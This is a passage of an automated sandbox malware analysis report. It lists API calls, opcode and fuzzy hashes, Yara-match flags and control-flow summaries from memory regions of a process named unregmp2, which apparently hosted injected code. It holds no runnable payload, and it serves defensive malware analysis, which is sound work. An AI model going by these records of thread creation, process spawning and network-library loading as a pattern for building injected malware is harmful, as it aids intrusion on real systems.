                  • Opcode ID: 44f088f76123ed5092e5282c834bcbc7d565fe8bfb8e459442914f497d5fa50c
                  • Instruction ID: 0b77e0e50139ec4d8a2cd3021d3b888cfe73b3f950ebb40af80d6f6e579e8bb5
                  • Opcode Fuzzy Hash: 44f088f76123ed5092e5282c834bcbc7d565fe8bfb8e459442914f497d5fa50c
                  • Instruction Fuzzy Hash: 1C90023120544842F64071584404A4600258BD0309F55C011B40697A5D9A25DE65BA61
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d87f3b88324d2495e149e0ef73197f932522c2f06e39626acf462451c96afff3
                  • Instruction ID: 4346076bc87d7aada55e50ab46744ab11ce909c729df7193534c60b5ab4588c7
                  • Opcode Fuzzy Hash: d87f3b88324d2495e149e0ef73197f932522c2f06e39626acf462451c96afff3
                  • Instruction Fuzzy Hash: D990023160540802F6507158441474600158BD0305F55C011B4029765D8B55DB657AA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 94c9dd0d0688a43e40ebdf0883f27c1bc21c70e07ddf930b4659f3a0335fc801
                  • Instruction ID: 401dc31800518506dcc739a325185712f2e9f8bd2fd3869ce117502eaf6fe026
                  • Opcode Fuzzy Hash: 94c9dd0d0688a43e40ebdf0883f27c1bc21c70e07ddf930b4659f3a0335fc801
                  • Instruction Fuzzy Hash: 6890026120240003660571584414616401A8BE0205B55C021F50196A1DC925D9A17525
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: cbcdfc4c0c65c3db0b1031ed8a93ba423dc292de8a97abfd0b4ccc880fc3c02d
                  • Instruction ID: 5d945eeddd0c7dee02acfa699a6ec8f3c0eeb2543da16cfdbc10e2d2c8ae9e92
                  • Opcode Fuzzy Hash: cbcdfc4c0c65c3db0b1031ed8a93ba423dc292de8a97abfd0b4ccc880fc3c02d
                  • Instruction Fuzzy Hash: 1590023160550402F6007158451470610158BD0205F65C411B4429679D8B95DA6179A2
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 57244e2a06cd7f0074ff5f107e5e17467a521bf45b13bfcf7300e52b11b48357
                  • Instruction ID: 06a832712b3e68bb566ace56603c2d4fd4f1b98c9a7c9105571ca5d3acd5fe04
                  • Opcode Fuzzy Hash: 57244e2a06cd7f0074ff5f107e5e17467a521bf45b13bfcf7300e52b11b48357
                  • Instruction Fuzzy Hash: 7F90022124545102F650715C44046164015ABE0205F55C021B48196A5D8955D9657621

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph (node and edge list omitted): entry bc97a6-bc97ae; bc974e-bc9781 call bc1410, call be1260; bc9783-bc979f call beb4c7, CreateThread; bca230 call be9b60
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BC9795
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID: !$"X$#z$'$'r$)$+`$-Q$/$2u$6Z$:$<l$B?$E$H$H$J$M-$P$PT$S$[$\U$]$]$c$cq$d$gu$h$k$l!$p$q8$xC$y${$|$'$0
                  • API String ID: 2422867632-1502332348
                  • Opcode ID: ff602d26d9f6cf80c9d79c864edeb503f59450b53307c05347d260f823fcda33
                  • Instruction ID: 2c110a492308748d58a69bb69a87471c38cd090b0170a906e5ff3d3a1a55d338
                  • Opcode Fuzzy Hash: ff602d26d9f6cf80c9d79c864edeb503f59450b53307c05347d260f823fcda33
                  • Instruction Fuzzy Hash: E2B15BB0D05769DBEB608F45CD597DEBAB0BB05308F1081D9D15C3B281CBBA1A89CF95

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 559 bd096e-bd0975 560 bd0977-bd0978 559->560 561 bd09e0-bd09e9 559->561 562 bd0a5d-bd0aaa call bea980 call bd4410 call bc1410 call be1260 561->562 563 bd09eb-bd0a10 561->563 572 bd0aac-bd0abb PostThreadMessageW 562->572 573 bd0aca-bd0ad0 562->573 563->562 572->573 574 bd0abd-bd0ac7 572->574 574->573
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7454168B$7454168B
                  • API String ID: 0-2062695193
                  • Opcode ID: eb29f3346ce0dfc0abc71e2db90ff159bc60dc48cf0b0c659f5e24b8758ec31c
                  • Instruction ID: 323ac1fba65866eb115fb74b3ed654dd87fa41a5294f9823419dae288b55c7bf
                  • Opcode Fuzzy Hash: eb29f3346ce0dfc0abc71e2db90ff159bc60dc48cf0b0c659f5e24b8758ec31c
                  • Instruction Fuzzy Hash: 73115B7690125C7ADB02ABA48C82EEEF7ACDB81344F4580A4F500AB202D7398D024B91

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 575 bd09c5-bd0aaa call bea980 call bd4410 call bc1410 call be1260 586 bd0aac-bd0abb PostThreadMessageW 575->586 587 bd0aca-bd0ad0 575->587 586->587 588 bd0abd-bd0ac7 586->588 588->587
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00BD0AB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: ca348407d5b1944811bfe4eadfca62e965c58c39670b4a0310f8f54c236a6000
                  • Instruction ID: 724cf46638d49f9abd82622a2569237a84d84869a5702a2da757987c30b04739
                  • Opcode Fuzzy Hash: ca348407d5b1944811bfe4eadfca62e965c58c39670b4a0310f8f54c236a6000
                  • Instruction Fuzzy Hash: 84116BB2901248BBCB019BA08C81DFFB7BCEF40398F4184E9F900BB201D7345E068BA0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 589 bd0a38-bd0aaa call be9f70 call bea980 call bd4410 call bc1410 call be1260 601 bd0aac-bd0abb PostThreadMessageW 589->601 602 bd0aca-bd0ad0 589->602 601->602 603 bd0abd-bd0ac7 601->603 603->602
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00BD0AB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: a8c304efd5c02d92ecfb49fb5b7ee7b242346f5fbdbb4abecb6768fee03ccac6
                  • Instruction ID: 6e4f8398dff9e4c185b0b6b902922743aaa491ea7f2a6b108cd320a499a3c4f0
                  • Opcode Fuzzy Hash: a8c304efd5c02d92ecfb49fb5b7ee7b242346f5fbdbb4abecb6768fee03ccac6
                  • Instruction Fuzzy Hash: 700108B2C0124C7AEB10ABD48C82DEFBBBCDF40394F0584A4FA04A7241E6345E068BA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 604 bd0a40-bd0a52 605 bd0a5a-bd0aaa call bea980 call bd4410 call bc1410 call be1260 604->605 606 bd0a55 call be9f70 604->606 616 bd0aac-bd0abb PostThreadMessageW 605->616 617 bd0aca-bd0ad0 605->617 606->605 616->617 618 bd0abd-bd0ac7 616->618 618->617
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00BD0AB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193
                  • Opcode ID: b60be7116bc06f8b8b93d5cefc255e95bb917c2f1948d5dfb75a831db110d307
                  • Instruction ID: a9c4be7afb938a30a5c8363fd7cb0d898cec34e6dee36d3e7e0f92e94a3491be
                  • Opcode Fuzzy Hash: b60be7116bc06f8b8b93d5cefc255e95bb917c2f1948d5dfb75a831db110d307
                  • Instruction Fuzzy Hash: 9E01DBB5D0124C7ADB11A7D58C82DEFBBBCDF41794F4580A5F904B7241D6345E068BB1
                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 00BE2C0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 19a28b8466f8829b74efd31151b63adb97cc94ea97e461d3178ffe3d36e729e9
                  • Instruction ID: dee201a7498c8d9902e398f5485db89a2804a046ba0bd591110a614efd938a68
                  • Opcode Fuzzy Hash: 19a28b8466f8829b74efd31151b63adb97cc94ea97e461d3178ffe3d36e729e9
                  • Instruction Fuzzy Hash: 9F318DB1600304BBC718DF65D885FEBBBE8FB88704F10866DBA595B245D770BA44CBA4
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00BDEBC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID: @J7<
                  • API String ID: 2538663250-2016760708
                  • Opcode ID: 5ce6dcf617c5f06965163bde57df42a3b2a15ec3d3217ad3b8d92d4294f82889
                  • Instruction ID: 0e0cc257355f7b48f4901b5a97282adec8a7aa8e8c44670221e7faab889c4364
                  • Opcode Fuzzy Hash: 5ce6dcf617c5f06965163bde57df42a3b2a15ec3d3217ad3b8d92d4294f82889
                  • Instruction Fuzzy Hash: 5A313EB5A1060AAFDB00DFD8D8809EEB7B9FF88304B148599E515AB314D771EE058BA0
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BD4482
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                  • Instruction ID: 76a04340122ff8e00ff5b45e2d6dab225abb00025b9d17884706dabd7bf53c6c
                  • Opcode Fuzzy Hash: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
                  • Instruction Fuzzy Hash: 0D010CB5E4024DABDF10DAE5DC42F9EB7B89B54708F008195A91897241FB31EB588B91
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,00BD7CE3,00000010,?,?,?,00000044,?,00000010,00BD7CE3,?,?,?), ref: 00BE8433
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: f5d22d67842d2450b27c3065ff42fba51732c5ca887623a77e2c9bf35b7c859c
                  • Instruction ID: 5267f9081e0f0c409c889f9c007c904cf469654e6cd85c0a4a7e9b70b1f59b9a
                  • Opcode Fuzzy Hash: f5d22d67842d2450b27c3065ff42fba51732c5ca887623a77e2c9bf35b7c859c
                  • Instruction Fuzzy Hash: F801C0B2201108BBCB48DE89DC81EEB77ADAF8D714F408108BA09E3241D631F9518BA4
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BC9795
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 761c4c79b673f4af8e8a6f622ab2f12ea5dff2cd1a5a576294190b8fd4754503
                  • Instruction ID: d614d29a74448d8a0749750ee9f03efe80aaa6bce99d229166bf8df0d66212aa
                  • Opcode Fuzzy Hash: 761c4c79b673f4af8e8a6f622ab2f12ea5dff2cd1a5a576294190b8fd4754503
                  • Instruction Fuzzy Hash: 80F0303334121436E22065E99C02FD7769CCB81B61F140469F70CEA2C1DA96B90186A4
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BC9795
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: eeaae81f0b582460093ea9faca58f56e322993ab709f0aeb9a730b36c156ee7b
                  • Instruction ID: 8f65b7fe0d3822f579226557b2aefb8cce556938ea205c3e59214edaeb9febf0
                  • Opcode Fuzzy Hash: eeaae81f0b582460093ea9faca58f56e322993ab709f0aeb9a730b36c156ee7b
                  • Instruction Fuzzy Hash: C8E0923225030077F62076999C03FDB62C88F40B10F2004AAF718EF2C1DAA5B9414694
                  APIs
                  • RtlAllocateHeap.NTDLL(00BD1659,?,00BE4C5B,00BD1659,00BE4657,00BE4C5B,?,00BD1659,00BE4657,00001000,?,?,00BE9BC0), ref: 00BE832F
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
                  • Instruction ID: 7f79b401dac4822e2a125ac85a2bd20da61c321ef638d5b2c2374e5dd1196061
                  • Opcode Fuzzy Hash: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
                  • Instruction Fuzzy Hash: 2CE06DB16012047BDA14EE59DC45F9B37ACEFC6710F504409F918A7242D671B9108BB4
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,08E2C10E,00000007,00000000,00000004,00000000,00BD3CE6,000000F4,?,?,?,?,?), ref: 00BE837F
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
                  • Instruction ID: 1e06e4cae469632f1b5e5a2a95851d05b30beab39bb4532ad558039c5216ef6e
                  • Opcode Fuzzy Hash: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
                  • Instruction Fuzzy Hash: EFE065B26056487BD614EE5ADC41FDB33ACEFCA710F408409F908A7242CA71B9118BB5
                  APIs
                  • GetFileAttributesW.KERNELBASE(?), ref: 00BD7D4C
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 3808e0d5ce3175fb2009888138a180ee8ca0d458d53aa132950fd60b491c031d
                  • Instruction ID: b66cab7676a30019c43dfbbb712cc86fb6fa87976fef0d3254b23e97b5cccc81
                  • Opcode Fuzzy Hash: 3808e0d5ce3175fb2009888138a180ee8ca0d458d53aa132950fd60b491c031d
                  • Instruction Fuzzy Hash: 2EE0D8711842041BE724B6689C41FB633888B44724F2405A4B91CCF2D1FD35F9018150
                  APIs
                  • SetErrorMode.KERNELBASE(00008003,?,?,00BD1940,00BE6D77,00BE4657,?), ref: 00BD7B63
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: dfc5498256f3f42d30417f06aff1b8dcaf75e4f5e2812cd8907967518924d2f9
                  • Instruction ID: 27a66d07b392afc7e302e169b0b76dfa2cc9affb09a8473e69d4197ddb619c76
                  • Opcode Fuzzy Hash: dfc5498256f3f42d30417f06aff1b8dcaf75e4f5e2812cd8907967518924d2f9
                  • Instruction Fuzzy Hash: 35D05E716842047BE644E6A98C43F5A32CC8B00754F1444B9BA08EB3C2ED65F6108569
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BD4482
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
                  • Instruction ID: 9a9ad566c66e36349e7d86266c85f4af840e851a31b025ca915464e6f4eaed4d
                  • Opcode Fuzzy Hash: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
                  • Instruction Fuzzy Hash: D4D02B7668D10A8FC700CB6CD457748F7E4AB14304F0502C9CC945B750C63062C28B52
                  APIs
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5fce452350020e7aa177037fc5bf74a368d9c6f3a184604b498ae4ca2d2c722e
                  • Instruction ID: 8ff28907b7693777471f4955d3ddea94edc4ffd1dc5d5fb40cfe07634ecf9bdc
                  • Opcode Fuzzy Hash: 5fce452350020e7aa177037fc5bf74a368d9c6f3a184604b498ae4ca2d2c722e
                  • Instruction Fuzzy Hash: 78B09B719015C5C6FF11F760460971779107BD0745F15C061F2034752E4778D1D1F575
                  Memory Dump Source
                  • Source File: 00000009.00000002.3780609960.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5020000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3cec39893d6c948886090f3fad540364776a4f0ae7665075c8f9c425deac5524
                  • Instruction ID: 0704231de73d21d12183bf334bd1ee2f958acc4558786b7558dd4482a2fad848
                  • Opcode Fuzzy Hash: 3cec39893d6c948886090f3fad540364776a4f0ae7665075c8f9c425deac5524
                  • Instruction Fuzzy Hash: 6C51063061CB1D4FD768EF6DE0956BEB3E2FB98310F50492DD88AC3252DA74E8428785
                  Memory Dump Source
                  • Source File: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_bc0000_unregmp2.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 716480791c4d6f476667343191db59f7f387b16f2232a41d68afbde5e93be7a7
                  • Instruction ID: 508b329bf10e67f30fa856ce083a82e25b5865af5e37c5b2cdf2f350433552a3
                  • Opcode Fuzzy Hash: 716480791c4d6f476667343191db59f7f387b16f2232a41d68afbde5e93be7a7
                  • Instruction Fuzzy Hash: 48A00127FA501802D5245C4EB8812B8E3A8D3CB276E5032B7ED0CF76405497D8AA019D
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3780609960.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5020000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                  • API String ID: 0-3558027158
                  • Opcode ID: 43eb559cd07aca5cdfbbe0671a38cd4b689c261cf601b04c2cae4e7dec51fbce
                  • Instruction ID: 90354a9ad26b3f0fe4a57479e7ea3255f0d45ad0d20a39346977994c87064d4a
                  • Opcode Fuzzy Hash: 43eb559cd07aca5cdfbbe0671a38cd4b689c261cf601b04c2cae4e7dec51fbce
                  • Instruction Fuzzy Hash: B99140F04082988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 670cf8d337e85692d215e72b2ebdf7b9ab69d9eeb0393ecf9f442a2f43c6b9bd
                  • Instruction ID: 83ec834e052fc021618a5b93c17eaa286e0b975614405c4c273ab1ab643a8c0b
                  • Opcode Fuzzy Hash: 670cf8d337e85692d215e72b2ebdf7b9ab69d9eeb0393ecf9f442a2f43c6b9bd
                  • Instruction Fuzzy Hash: 4351C6B6B00156BFDB10DF98889097EFBB8BB493447548269F4A5D7641E634FE408BE0
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 2d14177f6d61effda3990b12f2b15924cafe418d5e809c8d2d287067dda12c94
                  • Instruction ID: ca551bfdae51ca590321d6c0fc43fe673a91a2df01302d718942890414e87bb0
                  • Opcode Fuzzy Hash: 2d14177f6d61effda3990b12f2b15924cafe418d5e809c8d2d287067dda12c94
                  • Instruction Fuzzy Hash: CF51F572B00645EBDB24DE5CCC989BFB7F9EB44304B4084AAE5D6D7641EA74FA4087A0
                  Strings
                  • ExecuteOptions, xrefs: 04D746A0
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04D74742
                  • Execute=1, xrefs: 04D74713
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04D746FC
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04D74787
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04D74655
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04D74725
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
